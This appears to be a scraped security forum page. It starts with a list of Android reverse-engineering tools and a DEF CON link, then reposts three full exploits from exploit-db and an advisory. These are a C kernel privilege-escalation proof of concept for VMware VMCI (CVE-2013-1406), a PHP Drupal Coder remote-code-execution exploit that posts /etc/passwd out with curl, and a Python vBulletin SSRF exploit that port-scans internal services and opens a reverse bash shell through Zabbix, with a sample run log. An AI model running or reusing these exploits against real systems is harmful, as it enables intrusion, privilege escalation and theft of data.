3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with an app easier because of project-like file structure and automation of some repetitive tasks like building apk, etc. Features: Disassembling resources to nearly original form (including resources.arsc, classes.dex, 9.png. and XMLs) Rebuilding decoded resources back to binary APK/JAR Organizing and handling APKs that depend on framework resources Smali Debugging (Removed in 2.1.0 in favor of IdeaSmali) Helping with repetitive tasks 5. ANDROID FRAMEWORK FOR EXPLOITATION Android Framework for Exploitation is a framework for exploiting android based devices and applications. 6. BYPASS SIGNATURE AND PERMISSION CHECKS FOR IPCS This tool leverages Cydia Substrate to bypass signature and permission checks for IPCs. 7. ANDROID OPENDEBUG This tool leverages Cydia Substrate to make all applications running on the device debuggable; once installed any application will let a debugger attach to them. 8. DARE Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techniques developed for traditional Java applications. 9. DEX2JAR Tools to work with android .dex and java .class files. 10. ENJARIFY Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications. 11. DEDEXER Dedexer is a disassembler tool for DEX files. DEX is a format introduced by the creators of the Android platform. The format and the associated opcode set is in distant relationship with the Java class file format and Java bytecodes. Dedexer is able to read the DEX format and turn into an “assembly-like format”. This format was largely influenced by the Jasmin syntax but contains Dalvik opcodes. For this reason, Jasmin is not able to compile the generated files. 12. FINO An Android Dynamic Analysis Tool. 13. INDROID The aim of the project is to demonstrate that a simple debugging functionality on *nix systems a.k.a ptrace() can be abused by malware to inject malicious code in remote processes. Indroid provides CreateRemoteThread() equivalent for ARM based *nix devices. If you want to get a more deeper insight into the working of the framework you may: Watch the Defcon 19 video on Jugaad – http://www.youtube.com/watch?v=vju6tq1lp0k Read the paper – http://www.slideshare.net/null0x00/project-jugaad 14. INTENTSNIFFER Intent Sniffer is a tool that can be used on any device using the Google Android operating system (OS). On the Android OS, an Intent is description of an action to be performed, such as startService to start a service. The Intent Sniffer tool performs monitoring of runtime routed broadcasts Intents. It does not see explicit broadcast Intents, but defaults to (mostly) unprivileged broadcasts. There is an option to see recent tasks Intents (GET_TASKS), as Activity’s intents are visible when started. The tool can also dynamically update Actions & Categories. 15. INTROSPY Blackbox tool to help understand what an Android application is doing at runtime and assist in the identification of potential security issues. 16. JAD Jad is a Java decompiler. 17. JD-GUI JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields. 18. CFR CFR will decompile modern Java features – Java 8 lambdas (pre and post Java beta 103 changes), Java 7 String switches etc, but is written entirely in Java 6. 19. KRAKATAU Krakatau currently contains three tools – a decompiler and disassembler for Java classfiles and an assembler to create classfiles. 20. PROCYON While still incomplete, tests seem to indicate that the Procyon decompiler can generally hold its own against the other leading Java decompilers out there. 21. FERNFLOWER Fernflower is the first actually working analytical decompiler for Java. 22. REDEXER Redexer is a reengineering tool that manipulates Android app binaries. This tool is able to parse a DEX file into an in-memory data structure; to infer with which parameters the app uses certain permissions (we name this feature RefineDroid); to modify and unparse that data structure to produce an output DEX file (we name these features Dr. Android, which stands for Dalvik Rewriting for Android). 23. SIMPLIFY ANDROID DEOBFUSCATOR Simplify virtually executes an app to understand its behavior and then tries to optimize the code so that it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn’t matter what the specific type of obfuscation is used. 24. BYTECODE VIEWER Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more. It’s written completely in Java, and it’s open sourced. It’s currently being maintained and developed by Konloch. There is also a plugin system that will allow you to interact with the loaded classfiles, for example you can write a String deobfuscator, a malicious code searcher, or something else you can think of. You can either use one of the pre-written plugins, or write your own. It supports groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV, this allows the user to handle it completely using ASM. 25. RADARE2 r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files. Radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but later added support for reversing apks, analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers, etc… Sursa: https://hackerlists.com/android-reverse-engineering-tools/

Prexentarile de la Defcon 2016. Link: https://media.defcon.org/DEF CON 24/DEF CON 24 presentations/

VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept /* CVE-2013-1406 exploitation PoC by Artem Shishkin, Positive Research, Positive Technologies, 02-2013 */ void __stdcall FireShell(DWORD dwSomeParam) { EscalatePrivileges(hProcessToElevate); // Equate the stack and quit the cycle #ifndef _AMD64_ __asm { pop ebx pop edi push 0xFFFFFFF8 push 0xA010043 } #endif } HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0) { HANDLE hResult = 0; DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return 0; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr)) { hResult = pHandleTable->Handles[i].HandleValue; break; } } return hResult; } PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) { PVOID pResult = 0; DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return 0; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) { pResult = (HANDLE)pHandleTable->Handles[i].Object; break; } } return pResult; } void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) { DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) { pHandleTable->Handles[i].Object = NULL; pHandleTable->Handles[i].HandleValue = NULL; break; } } return; } void PoolSpray() { // Init used native API function lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation"); if (NtQuerySystemInformation == NULL) { printf("Such a fail...\n"); return; } // Determine object size // xp: //const DWORD_PTR dwSemaphoreSize = 0x38; // 7: //const DWORD_PTR dwSemaphoreSize = 0x48; DWORD_PTR dwSemaphoreSize = 0; if (LOBYTE(GetVersion()) == 5) { dwSemaphoreSize = 0x38; } else if (LOBYTE(GetVersion()) == 6) { dwSemaphoreSize = 0x48; } unsigned int cycleCount = 0; while (cycleCount < 50000) { HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL); if (hTemp == NULL) { break; } ++cycleCount; } printf("\t[+] Spawned lots of semaphores\n"); printf("\t[.] Initing pool windows\n"); Sleep(2000); DWORD dwNeeded = 4096; NTSTATUS status = 0xFFFFFFFF; PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE); while (true) { status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL); if (status != STATUS_SUCCESS) { dwNeeded *= 2; VirtualFree(pBuf, 0, MEM_RELEASE); pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE); } else { break; } }; HANDLE hHandlesToClose[0x30] = {0}; DWORD dwCurPID = GetCurrentProcessId(); PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf; for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++) { if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID) { DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object; DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue; DWORD_PTR dwWindowAddress = 0; bool bPoolWindowFound = false; UINT iObjectsNeeded = 0; // Needed window size is vmci packet pool chunk size (0x218) divided by // Semaphore pool chunk size (dwSemaphoreSize) iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0); if ( // Not on a page boundary ((dwTestObjAddr & 0xFFF) != 0) && // Doesn't cross page boundary (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000)) ) { // Check previous object for being our semaphore DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize; if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL) { continue; } for (unsigned int j = 1; j < iObjectsNeeded; j++) { DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize); HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr); //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal); //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr); //printf("\tLooked up handle = %08X\n", hLookedUp); if (hLookedUp != NULL) { hHandlesToClose[j] = hLookedUp; if (j == iObjectsNeeded - 1) { // Now test the following object dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize); if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL) { hHandlesToClose[0] = (HANDLE)dwTestHandleVal; bPoolWindowFound = true; dwWindowAddress = dwTestObjAddr; // Close handles to create a memory window for (int k = 0; k < iObjectsNeeded; k++) { if (hHandlesToClose[k] != NULL) { CloseHandle(hHandlesToClose[k]); CloseTableHandle(pHandleTable, hHandlesToClose[k]); } } } else { memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); break; } } } else { memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); break; } } if (bPoolWindowFound) { printf("\t[+] Window found at %08X!\n", dwWindowAddress); } } } } VirtualFree(pBuf, 0, MEM_RELEASE); return; } void InitFakeBuf(PVOID pBuf, DWORD dwSize) { if (pBuf != NULL) { RtlFillMemory(pBuf, dwSize, 0x11); } return; } void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep) { /* Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043 So, for every 0xXXXX0043 address we must suffice the following conditions: lea edx, [eax+38h] lock xadd [edx], ecx cmp ecx, 1 Some sort of lock at [addr + 38] must be equal to 1. And call dword ptr [eax+0ACh] The call site is located at [addr + 0xAC] Also fake the object to be dereferenced at [addr + 0x100] */ if (pBuf != NULL) { for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep) { PDWORD pLock = (PDWORD)(iAddr + 0x38); PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC); PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100); *pLock = 1; *pCallMeMayBe = (DWORD_PTR)FireShell; *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000; } } return; } void PenetrateVMCI() { /* VMware Security Advisory Advisory ID: VMSA-2013-0002 Synopsis: VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability Issue date: 2013-02-07 Updated on: 2013-02-07 (initial advisory) CVE numbers: CVE-2013-1406 */ DWORD dwPidToElevate = 0; HANDLE hSuspThread = NULL; bool bXP = (LOBYTE(GetVersion()) == 5); bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1)); bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2)); if (!InitKernelFuncs()) { printf("[-] Like I don't know where the shellcode functions are\n"); return; } if (bXP) { printf("[?] Who do we want to elevate?\n"); scanf_s("%d", &dwPidToElevate); hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate); if (hProcessToElevate == NULL) { printf("[-] This process doesn't want to be elevated\n"); return; } } if (b7 || b8) { // We are unable to change an active process token on-the-fly, // so we create a custom shell suspended (Ionescu hack) STARTUPINFO si = {0}; PROCESS_INFORMATION pi = {0}; si.wShowWindow = TRUE; WCHAR cmdPath[MAX_PATH] = {0}; GetSystemDirectory(cmdPath, MAX_PATH); wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe"); if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE) { hProcessToElevate = pi.hProcess; hSuspThread = pi.hThread; } } HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL); if (hVMCIDevice != INVALID_HANDLE_VALUE) { UCHAR BadBuff[0x624] = {0}; UCHAR retBuf[0x624] = {0}; DWORD dwRet = 0; printf("[+] VMCI service found running\n"); PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff; pVmReq->Header.RequestSize = 0xFFFFFFF0; PVOID pShellSprayBufStd = NULL; PVOID pShellSprayBufQtd = NULL; PVOID pShellSprayBufStd7 = NULL; PVOID pShellSprayBufQtd7 = NULL; PVOID pShellSprayBufChk8 = NULL; if ((b7) || (bXP) || (b8)) { /* Significant bits of a PoolType of a chunk define the following regions: 0x0A000000 - 0x0BFFFFFF - Standard chunk 0x1A000000 - 0x1BFFFFFF - Quoted chunk 0x0 - 0xFFFFFFFF - Free chunk - no idea Addon for Windows 7: Since PoolType flags have changed, and "In use flag" is now 0x2, define an additional region for Win7: 0x04000000 - 0x06000000 - Standard chunk 0x14000000 - 0x16000000 - Quoted chunk */ pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL)) { printf("\t[-] Unable to map the needed memory regions, please try running the app again\n"); CloseHandle(hVMCIDevice); return; } InitFakeBuf(pShellSprayBufStd, 0x2000000); InitFakeBuf(pShellSprayBufQtd, 0x2000000); InitFakeBuf(pShellSprayBufStd7, 0x2000000); InitFakeBuf(pShellSprayBufQtd7, 0x2000000); PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000); if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE) { SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST); } PoolSpray(); if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE) { printf("\t[!] If you don't see any BSOD, you're successful\n"); if (b7 || b8) { ResumeThread(hSuspThread); } } else { printf("[-] Not this time %d\n", GetLastError()); } if (pShellSprayBufStd != NULL) { VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE); } if (pShellSprayBufQtd != NULL) { VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE); } } SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL); CloseHandle(hVMCIDevice); } else { printf("[-] Like I don't see vmware here\n"); } CloseHandle(hProcessToElevate); return; } Sursa: https://www.exploit-db.com/exploits/40164/

Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039) <?php # Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039) # https://www.drupal.org/node/2765575 # by Raz0r (http://raz0r.name) # # E-DB Note: Source ~ https://gist.github.com/Raz0r/7b7501cb53db70e7d60819f8eb9fcef5 $cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd"; $host = "http://localhost:81/drupal-7.12/"; $a = array( "upgrades" => array( "coder_upgrade" => array( "module" => "color", "files" => array("color.module") ) ), "extensions" => array("module"), "items" => array (array("old_dir"=>"test; $cmd;", "new_dir"=>"test")), "paths" => array( "modules_base" => "../../../", "files_base" => "../../../../sites/default/files" ) ); $payload = serialize($a); file_get_contents($host . "/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php?file=data://text/plain;base64," . base64_encode($payload)); ?> Sursa: https://www.exploit-db.com/exploits/40144/

============================================= - Discovered by: Dawid Golunski - http://legalhackers.com - dawid (at) legalhackers.com - CVE-2016-6483 - Release date: 05.08.2016 - Severity: High ============================================= I. VULNERABILITY ------------------------- vBulletin <= 5.2.2 Preauth Server Side Request Forgery (SSRF) vBulletin <= 4.2.3 vBulletin <= 3.8.9 II. BACKGROUND ------------------------- vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. https://www.vbulletin.com/ https://en.wikipedia.org/wiki/VBulletin A google search for "Powered by vBulletin" returns over 19 million sites that are hosting a vBulletin forum: https://www.google.co.uk/?gws_rd=ssl#q=%22Powered+by+vBulletin%22 III. INTRODUCTION ------------------------- vBulletin forum software is affected by a SSRF vulnerability that allows unauthenticated remote attackers to access internal services (such as mail servers, memcached, couchDB, zabbix etc.) running on the server hosting vBulletin as well as services on other servers on the local network that are accessible from the target. This advisory provides a PoC exploit that demonstrates how an unauthenticated attacker could perform a port scan of the internal services as well as execute arbitrary system commands on a target vBulletin host with a locally installed Zabbix Agent monitoring service. IV. DESCRIPTION ------------------------- vBulletin allows forum users to share media fiels by uploading them to the remote server. Some pages allow users to specify a URL to a media file that a user wants to share which will then be retrieved by vBulletin. The user-provided links are validated to make sure that users can only access resources from HTTP/HTTPS protocols and that connections are not allowed in to the localhost. These restrictions can be found in core/vb/vurl/curl.php source file: /** * Determine if the url is safe to load * * @param $urlinfo -- The parsed url info from vB_String::parseUrl -- scheme, port, host * @return boolean */ private function validateUrl($urlinfo) { // VBV-11823, only allow http/https schemes if (!isset($urlinfo['scheme']) OR !in_array(strtolower($urlinfo['scheme']), array('http', 'https'))) { return false; } // VBV-11823, do not allow localhost and 127.0.0.0/8 range by default if (!isset($urlinfo['host']) OR preg_match('#localhost|127\.(\d)+\.(\d)+\.(\d)+#i', $urlinfo['host'])) { return false; } if (empty($urlinfo['port'])) { if ($urlinfo['scheme'] == 'https') { $urlinfo['port'] = 443; } else { $urlinfo['port'] = 80; } } // VBV-11823, restrict detination ports to 80 and 443 by default // allow the admin to override the allowed ports in config.php (in case they have a proxy server they need to go to). $config = vB::getConfig(); [...] HTTP redirects are also prohibited however there is one place in the vBulletin codebase that accepts redirects from the target server specified in a user-provided link. The code is used to upload media files within a logged-in user's profile and can normally be accessed under a path similar to: http://forum/vBulletin522/member/1-mike/media By specifying a link to a malicious server that returns a 301 HTTP redirect to the URL of http://localhost:3306 for example, an attacker could easily bypass the restrictions presented above and make a connection to mysql/3306 service listening on the localhost. This introduces a Server Side Request Forgery (SSRF) vulnerability. As curl is used to fetch remote resources, in addition to HTTP, attackers could specify a handful of other protocols to interact with local services. For instance, by sending a redirect to gopher://localhost:11211/datahere attackers could send arbitrary traffic to memcached service on 11211 port. Additionally, depending on the temporary directory location configured within the forum, attackers could potentially view the service responses as the download function stores responses within temporary files which could be viewed if the temporary directory is exposed on the web server. V. PROOF OF CONCEPT EXPLOIT ------------------------- The exploit code below performs a port scan as well as demonstrates remote command execution via a popular Zabbix Agent monitoring service which might be listening on local port of 10050. The exploit will execute a reverse bash shell on the target if it has the agent installed and permits remote commands. The exploit was verified on the following zabbix agent configuration (/etc/zabbix/zabbix_agentd.conf): Server=127.0.0.1,::1 EnableRemoteCommands=1 ------------[ vBulletin_SSRF_exploit.py ]----------- #!/usr/bin/python intro = """ vBulletin <= 5.2.2 SSRF PoC Exploit (portscan / zabbix agent RCE) This PoC exploits an SSRF vulnerability in vBulletin to scan internal services installed on the web server that is hosting the vBulletin forum. After the scan, the exploit also checks for a Zabbix Agent (10050) port and gives an option to execute a reverse shell (Remote Commands) that will connect back to the attacker's host on port 8080 by default. Coded by: Dawid Golunski http://legalhackers.com """ usage = """ Usage: The exploit requires that you have an external IP and can start a listener on port 80/443 on the attacking machine. ./vBulletin_SSRF_exploit.py our_external_IP vBulletin_base_url [minimum_port] [maximum_port] Example invocation that starts listener on 192.168.1.40 (port 80) and scans local ports 1-85 on the remote vBulletin target host: ./vBulletin_SSRF_exploit.py 192.168.1.40 http://vbulletin-target/forum 1 85 Before exploiting Zabbix Agent, start your netcat listener on 8080 port in a separate shell e.g: nc -vv -l -p 8080 Disclaimer: For testing purposes only. Do no harm. SSL/TLS support needs some tuning. For better results, provide HTTP URL to the vBulletin target. """ import web # http://webpy.org/installation import threading import time import urllib import urllib2 import socket import ssl import sys # The listener that will send redirects to the targe class RedirectServer(threading.Thread): def run (self): urls = ('/([0-9a-z_]+)', 'do_local_redir') app = web.application(urls, globals()) #app.run() return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', our_port)) class do_local_redir: def GET(self,whereto): if whereto == "zabbixcmd_redir": # code exec # redirect to gopher://localhost:10050/1system.run[(/bin/bash -c 'nohup bash -i >/dev/tcp/our_ip/shell_port 0<&1 2>&1 &') ; sleep 2s] return web.HTTPError('301', {'Location': 'gopher://localhost:10050/1system.run%5b(%2Fbin%2Fbash%20-c%20%27nohup%20bash%20-i%20%3E%2Fdev%2Ftcp%2F'+our_ext_ip+'%2F'+str(shell_port)+'%200%3C%261%202%3E%261%20%26%27) %20%3B%20sleep%202s%5d' } ) else: # internal port connection return web.HTTPError('301', {'Location': "telnet://localhost:%s/" % whereto} ) def shutdown(code): print "\nJob done. Exiting" if redirector_started == 1: web.httpserver.server.interrupt = KeyboardInterrupt() exit(code) # [ Default settings ] # reverse shell will connect back to port defined below shell_port = 8080 # Our HTTP redirector/server port (must be 80 or 443 for vBulletin to accept it) our_port = 443 # How long to wait (seconds) before considering a port to be opened. # Don't set it too high to avoid service timeout and an incorrect close state connect_time = 2 # Default port scan range is limited to 20-90 to speed up things when testing, # feel free to increase maxport to 65535 here or on the command line if you've # got the time ;) minport = 20 maxport = 90 # ignore invalid certs (enable if target forum is HTTPS) #ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) # [ Main Meat ] print intro redirector_started = 0 if len(sys.argv) < 3 : print usage sys.exit(2) # Set our HTTP Listener/Redirector's external IP our_ext_ip = sys.argv[1] try: socket.inet_aton(our_ext_ip) except socket.error: print "Invalid HTTP redirector server IP [%s]!\n" % our_ext_ip exit(2) our_server = "http://%s:%s" % (our_ext_ip, our_port) # Target forum base URL (e.g. http://vulnerable-vbulletin/forum) targetforum = sys.argv[2] # Append vulnerable media upload script path to the base URL targeturl = targetforum.strip('/') + "/link/getlinkdata" # Change port range (if provided) if (len(sys.argv) == 5) : minport = int(sys.argv[3]) # Finish scanning at maxport maxport = int(sys.argv[4]) # Confirm data print "\n* Confirm your settings\n" print "Redirect server to listen on: %s:%s\nTarget vBulletin URL: %s\nScan ports between: %d - %d\n" % (our_ext_ip, our_port, targeturl, minport, maxport) key = raw_input("Are these settings correct? Hit enter to start the port scan... ") # Connection check print "\n* Testing connection to vulnerable script at [%s]\n" % targeturl req = urllib2.Request(targeturl, data=' ', headers={ 'User-Agent': 'Mozilla/5.0' } ) try: response = urllib2.urlopen(req, timeout=connect_time).read() except urllib2.URLError as e: print "Invalid forum URI / HTTP request failed (reason: %s)\n" % e.reason shutdown(2) # Server should return 'invalid_url' string if not url provided in POST if "invalid_url" not in response: print """Invalid target url (%s) or restricted access.\n \nTest with:\n curl -X POST -v %s\nShutting down\n""" % (targeturl, targeturl) sys.exit(2) else: print "Got the right response from the URL. The target looks vulnerable!\n" # [ Start the listener and perform a port scan ] print "Let's begin!\n" print "* Starting our redirect base server on %s:%s \n" % (our_ext_ip, our_port) RedirectServer().start() redirector_started = 1 print "* Scanning local ports from %d to %d on [%s] target \n" % (minport, maxport, targetforum) start = time.time() opened_ports = [] maxport+=1 for targetport in range(minport, maxport): #print "\n\nScanning port %d\n" % (targetport) fetchurl = '%s/%d' % (our_server, targetport) data = urllib.urlencode({'url' : fetchurl}) req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } ) try: response = urllib2.urlopen(req, timeout=connect_time) except urllib2.URLError, e: print "Oops, url issue? 403 , 404 etc.\n" except socket.timeout, ssl.SSLError: print "Conection opened for %d seconds. Port %d is opened!\n" % (connect_time, targetport) opened_ports.append(targetport) elapsed = (time.time() - start) print "\nScanning done in %d seconds. \n\n* Opened ports on the target [%s]: \n" % (elapsed, targetforum) for listening in opened_ports: print "Port %d : Opened\n" % listening print "\nAnything juicy? :)\n" if 10050 in opened_ports: print "* Zabbix Agent was found on port 10050 !\n" # [ Command execution via Zabbix Agent to gain a reverse shell ] key = raw_input("Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] ") if key != 'y' : shutdown(0) print "\n* Executing reverse shell via Zabbix Agent (10050)." fetchurl = '%s/%s' % (our_server, 'zabbixcmd_redir') data = urllib.urlencode({'url' : fetchurl}) req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } ) payload_executed = 0 try: response = urllib2.urlopen(req, timeout=connect_time) except urllib2.URLError, e: print "Oops, url issue? 403 , 404 etc.\n" except socket.timeout, ssl.SSLError: # Agent connection remained opened for 2 seconds after the bash payload was sent, # it looks like the sleep 2s shell command must have got executed sucessfuly payload_executed = 1 if (payload_executed == 1) : print "\nLooks like Zabbix Agent executed our bash payload! Check your netcat listening on port %d for shell! :)\n" % shell_port else: print "\nNo luck. No Zabbix Agent listening on 10050 port or remote commands are disabled :(\n" shutdown(0) ----------------------[ eof ]------------------------ Example run: root@trusty:~/vbexploit# ./vBulletin_SSRF_exploit.py 192.168.57.10 http://192.168.57.10/vBulletin522new/ 20 85 vBulletin <= 5.2.2 SSRF PoC Exploit (Localhost Portscan / Zabbix Agent RCE) This PoC exploits an SSRF vulnerability in vBulletin to scan internal services installed on the web server that is hosting the vBulletin forum. After the scan, the exploit also checks for a Zabbix Agent (10050) port and gives an option to execute a reverse shell (Remote Commands) that will connect back to the attacker's host on port 8080 by default. Coded by: Dawid Golunski http://legalhackers.com * Confirm your settings Redirect server to listen on: 192.168.57.10:443 Target vBulletin URL: http://192.168.57.10/vBulletin522new/link/getlinkdata Scan ports between: 20 - 85 Are these settings correct? Hit enter to start the port scan... * Testing connection to vulnerable script at [http://192.168.57.10/vBulletin522new/link/getlinkdata] Got the right response from the URL. The target looks vulnerable! Let's begin! * Starting our redirect base server on 192.168.57.10:443 * Scanning local ports from 20 to 85 on [http://192.168.57.10/vBulletin522new/] target http://0.0.0.0:443/ 192.168.57.10:58675 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /20" - 301 192.168.57.10:58679 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /21" - 301 192.168.57.10:58683 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /22" - 301 Conection opened for 2 seconds. Port 22 is opened! 192.168.57.10:58686 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /23" - 301 192.168.57.10:58690 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /24" - 301 192.168.57.10:58694 - - [30/Jul/2016 03:00:28] "HTTP/1.1 GET /25" - 301 Conection opened for 2 seconds. Port 25 is opened! 192.168.57.10:58697 - - [30/Jul/2016 03:00:30] "HTTP/1.1 GET /26" - 301 [...] 192.168.57.10:58909 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /79" - 301 192.168.57.10:58913 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /80" - 301 Conection opened for 2 seconds. Port 80 is opened! 192.168.57.10:58917 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /81" - 301 192.168.57.10:58921 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /82" - 301 192.168.57.10:58925 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /83" - 301 192.168.57.10:58929 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /84" - 301 192.168.57.10:58933 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /85" - 301 Scanning done in 14 seconds. * Opened ports on the target [http://192.168.57.10/vBulletin522new/]: 